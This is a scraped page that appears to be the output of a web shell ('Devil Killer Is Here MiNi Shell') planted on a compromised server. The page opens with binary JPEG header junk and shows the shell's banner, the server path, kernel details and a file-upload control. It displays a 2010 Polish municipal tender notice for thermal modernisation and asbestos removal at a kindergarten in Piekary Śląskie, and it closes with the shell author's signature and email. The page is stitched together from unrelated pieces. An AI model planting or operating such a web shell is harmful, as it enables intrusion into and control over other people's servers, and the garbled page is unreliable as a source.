JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100217/32953-N-2010.html

<p class="kh_header"><b>Piekary Śląskie: Termomodernizacja budynku Miejskiego Przedszkola nr 15 w Piekarach Śląskich przy ul. M. Skłodowskiej - Curie 104 wraz z usunięciem wyrobów zawierających azbest</b><br>
<b>Numer ogłoszenia: 32953 - 2010; data zamieszczenia: 17.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Miejskiego Przedszkola nr 15 w Piekarach Śląskich przy ul. M. Skłodowskiej - Curie 104 wraz z usunięciem wyrobów zawierających azbest.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót termomodernizacyjnych obejmuje:    
   
1. Demontaż i utylizację wyrobów zawierających azbest 
    -  demontaż płyt zawierających azbest, wyroby o gęstości objętościowej większej niż 1000  
        kg/m3  z  powierzchni  455,12 m2,  
    -   demontaż izolacji cieplnej w wymiennikowni oraz rur rozprowadzających, wyroby o  
         gęstości objętościowej mniejszej niż  1000kg/m3  z pow. 54,17 m2
    -  wywóz odpadów zawierających azbest ok. 27,11 m3,  7,84 Mg
    -  prowadzenie monitoringu i badań na zawartość włókien azbestu w powietrzu  
2. Docieplenie ścian budynku z wymianą stolarki okiennej i drzwiowej  -  ok.560 m2
3. Docieplenie  stropodachu  - ok.305 m2
4. Wymiana rynien, rur spustowych, obróbek blacharskich i instalacji odgromowej,   
    malowanie  oraz inne niezbędne roboty towarzyszące ujęte w dokumentacji.
5. Kompaktowa stacja wymienników ciepła + roboty demontażowe, budowlane, elektryczne
6. Wymiana instalacja centralnego ogrzewania wraz z grzejnikami
7. Pochylnia dla osób niepełnosprawnych
8. Przebudowa pomieszczeń z przystosowaniem dla osób niepełnosprawnych.
9. Wymiana instalacji wod - kan  w WC i umywalni z przystosowaniem dla osób niepełnosprawnych.

UWAGA!
Pod pojęciem /kompaktowa stacja wymienników ciepła/ zamawiający rozumie zespół urządzeń złożony z wymiennika ciepła, pomp i armatury regulacyjnej, odcinającej, pomiarowej wraz z kompletem automatyki, umieszczony na ramie montażowej w postaci kompaktowej.

Zakres prac powinien być wykonany zgodnie z dokumentacją techniczną  i obowiązującymi przepisami i normami.
Wykonawca winien stosować materiały posiadające atesty, świadectwa do stosowania w budownictwie, aprobaty techniczne itp. dla zakresu robót objętych przedmiotem zamówienia, które przedstawi zamawiającemu w dniu odbioru robót w dwóch egzemplarzach  dokumentacji odbiorowej.

W okresie lipca i sierpnia 2010r. obiekt będzie nieczynny i w tym czasie należy skoncentrować zakres robót szczególnie uciążliwych  dla funkcjonowania placówki, w pozostałych okresach obiekt będzie czynny i zakres robót należy  koordynować z kierownictwem  placówki i inspektorem nadzoru.

Na wykonane roboty Wykonawca udzieli 60-miesięcznej gwarancji.

INFORMACJE DOT. PRAC ZWIĄZANYCH Z AZBESTEM:

Zgodnie z Ustawą o odpadach z dnia 27 kwietnia 2001r. (t.j.: Dz. U. z 2007r. nr 39 poz. 251 z późn. zm.):
Art. 17. 1. Wytwórca odpadów jest obowiązany do:
	1)	uzyskania decyzji zatwierdzającej program gospodarki odpadami niebezpiecznymi, jeżeli wytwarza odpady niebezpieczne w ilości powyżej 0,1 Mg rocznie;
	2)	przedłożenia informacji o wytwarzanych odpadach oraz o sposobach gospodarowania wytworzonymi odpadami, jeżeli wytwarza odpady niebezpieczne w ilości do 0,1 Mg rocznie albo powyżej 5 Mg rocznie odpadów innych niż niebezpieczne.
2. Wytwórca odpadów jest obowiązany do uzyskania pozwolenia na wytwarzanie odpadów, które powstają w związku z eksploatacją instalacji, jeżeli wytwarza powyżej 1 Mg odpadów niebezpiecznych rocznie lub powyżej 5 tysięcy Mg odpadów innych niż niebezpieczne rocznie.
3. W pozwoleniu, o którym mowa w ust. 2, uwzględnia się wszystkie odpady wytwarzane przez danego wytwórcę w danym miejscu.
4. Wymóg uzyskania decyzji zatwierdzającej program gospodarki odpadami niebezpiecznymi, pozwolenia na wytwarzanie odpadów, a także przedłożenia informacji o wytwarzanych odpadach oraz o sposobach gospodarowania wytworzonymi odpadami nie dotyczy wytwórcy odpadów prowadzącego instalację, na której prowadzenie wymagane jest pozwolenie zintegrowane, o którym mowa w przepisach o ochronie środowiska.

Wnioski i karty informacyjne dostępne w załącznikach do SIWZ (załączniki nr S11, S12, S13)

i) Prace związane z usuwaniem azbestu muszą być prowadzone w taki sposób, aby zminimalizować uwalnianie się azbestu do środowiska, tak aby nie zostały przekroczone dopuszczalne wartości stężeń włókien azbestowych w powietrzu. 

ii) Prace przy usuwaniu azbestu mogą prowadzić jedynie wykonawcy posiadający dokumenty dopuszczające do demontażu materiałów azbestowych i mający odpowiednie wyposażenie techniczne i zatwierdzający przeszkolonych w tym zakresie pracowników.
iii) Podczas prac demontażowych przy elementach azbestowych wykonawca zobowiązany jest do:
umieszczenia tablic ostrzegawczych informujących o rodzaju prowadzonych prac,
ogrodzenia terenu, na którym prowadzone będą roboty,
zastosowania odpowiednich środków technicznych w celu zmniejszenia emisji włókien azbestu.

iv) Istotne jest, aby elementy azbestowe usuwać w całości, unikając ich łamania.
v) Przed przystąpieniem do robót rozbiórkowych powinno być dokonane określenie stanu środowiska w wyniku umowy podpisanej przez wykonawcę z laboratorium badawczym w celu uzyskania poziomu odniesienia dla późniejszych pomiarów zanieczyszczeń powietrza w miejscu robót i jego otoczeniu.
vi) W trakcie realizacji robót, jeżeli usuwane są wyroby o gęstości objętościowej mniejszej niż 1000 kg/m3 lub inne, mocno uszkodzone, a także zawierające krokidolit oraz wyroby znajdujące się w pomieszczeniach zamkniętych, niezbędne jest prowadzenie monitoringu powietrza przez upoważnione laboratorium posiadające akredytację w zakresie pomiarów zanieczyszczeń powstających przy usuwaniu wyrobów zawierających azbest.
vii) Po zakończeniu robót wykonawca ma obowiązek przedstawienia właścicielowi lub zarządcy obiektu, będącego przedmiotem prac, oświadczenia stwierdzającego prawidłowość wykonania prac i oczyszczenia z azbestu. W przypadku, gdy przedmiotem prac były wyroby o gęstości objętościowej mniejszej niż 1000 kr/m3 lub wyroby mocno uszkodzone i zniszczone lub prace obejmowały wyroby zawierające azbest krokidolit, lub prowadzone były w pomieszczeniach zamkniętych, wykonawca ma obowiązek przedstawienia wyników badania powietrza przeprowadzonego przez uprawnione do tego laboratorium lub instytucję.
viii) Procedury prowadzenia prac związanych z usuwaniem wyrobów azbestowych, wytwarzaniem odpadów niebezpiecznych wraz z oczyszczeniem obiektu i terenu zostały przedstawione szczegółowo w STWiOR1.

W związku z powyższym Wykonawca, którego oferta zostanie wybrana, zobowiązany jest do przedstawienia, przed przystąpieniem do prac demontażowych płyt azbestowych, następujących dokumentów:
zezwoleń na wytwarzanie, transport i unieszkodliwianie odpadów zawierających azbest, wydanych podmiotom świadczącym usługi w zakresie demontażu, transportu i unieszkodliwiania odpadów zawierających azbest;
decyzji zatwierdzającej program gospodarki odpadami niebezpiecznymi (jeżeli wytwarza odpady niebezpieczne w ilości powyżej 0,1 Mg rocznie);
informacji o wytwarzanych odpadach oraz o sposobach gospodarowania wytworzonymi odpadami (jeżeli wytwarza odpady niebezpieczne w ilości do 0,1 Mg rocznie albo powyżej 5 Mg rocznie odpadów innych niż niebezpieczne);
dokumentu określającego stan środowiska w miejscu robót i jego otoczeniu, wydanego przez laboratorium badawcze.
Do dokumentacji powykonawczej należy dołączyć dokumenty wymienione powyżej oraz:
protokół potwierdzający usunięcie, transport i unieszkodliwienie odpadów zawierających azbest pochodzący z powierzchni elewacji budynku ok. 510 m2;
kserokopię kart przekazania odpadów zawierających azbest w celu ich unieszkodliwienia na odpowiednim składowisku odpadów azbestowych;
oświadczenie wykonawcy stwierdzające prawidłowość wykonania prac i oczyszczenia z azbestu;
wyniki badania powietrza prowadzonego przez uprawnione do tego laboratorium lub instytucję (w przypadku opisanym w punkcie vii).


Po podpisaniu umowy, w terminie 5 dni należy, w uzgodnieniu z inwestorem, wykonać i przedstawić harmonogram rzeczowo - finansowy zadania. Płatność faktur ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej zostanie dokonana zgodnie z zatwierdzonym harmonogramem rzeczowo finansowym zadania, miesiąc po zakończonym kwartale, przelewem z konta Zamawiającego na konto Wykonawcy, po dokonaniu przelewu należności przez WFOŚiGW.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie prawidłowego wykonania w ostatnich pięciu latach robót o zakresie podobnym do  
    przedmiotu zamówienia. Spełnienie warunków udziału w postępowaniu zostanie ocenione według formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie dysponowania asortymentem technicznym odpowiednim do demontażu elementów azbestowych. Spełnienie warunków udziału w postępowaniu zostanie ocenione według formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie dysponowania osobami z uprawnieniami do pełnienia funkcji kierownika budowy w 
   specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie instalacji wodociągowych,
   kanalizacyjnych i cieplnych, instalacyjnej w zakresie elektrycznym i  pracownikami przeszkolonymi do demontażu elementów azbestowych a także  udokumentowanie przynależności kierowników robót do Okręgowej Izby Inżynierów Budownictwa oraz posiadania przez 
    nich ubezpieczenia od odpowiedzialności cywilnej. Spełnienie warunków udziału w postępowaniu zostanie ocenione według formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz min. 2 robót budowlanych wykonanych w okresie ostatnich 5 lat (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnych z przedmiotem zamówienia, z podaniem ich rodzaju, wartości,  daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że  roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokumenty te należy złożyć w ilości min.2 sztuk dla każdego z niżej podanych rodzajów robót: 
demontaż, transport i unieszkodliwianie odpadów zawierających azbest,
termomodernizacja elewacji, docieplanie dachu,
stolarka okienna i drzwiowa,
kompaktowa stacja wymienników ciepła,
instalacja centralnego ogrzewania.
2. Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia w zakresie kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, tzn. wykonawca polegający na potencjale osobowym innych podmiotów zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia do kierowania robotami budowlanymi w specjalnościach:
konstrukcyjno - budowlanej,
instalacyjnej w zakresie instalacji wodociągowych, kanalizacyjnych i cieplnych,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych.
4. Poświadczona za zgodność z oryginałem kopia dokumentów potwierdzających przynależność kierowników robót budowlanych do Okręgowej Izby Inżynierów Budownictwa oraz posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej.
5. Oświadczenie o dysponowaniu asortymentem technicznym odpowiednim do prowadzenia prac rozbiórkowych elementów azbestowych.
6. Oświadczenie o dysponowaniu pracownikami przeszkolonymi do prowadzenia prac rozbiórkowych elementów azbestowych.
W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, odpis z właściwego rejestru lub oświadczenie w zakresie art. 24 ust.1 pkt2 Ustawy Pzp składa każdy z Wykonawców oddzielnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miasta Piekary Śląskie, 41-940 Piekary Śląskie, ul. Bytomska 84, pok.218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 09:00, miejsce: Biuro Zamówień Publicznych Urzędu Miasta Piekary Śląskie, 41-940 Piekary Śląskie, ul. Bytomska 84, pok.218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane z budżetu miasta i ze środków Wojewódzkiego Funduszu Ochrony Środowiska.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com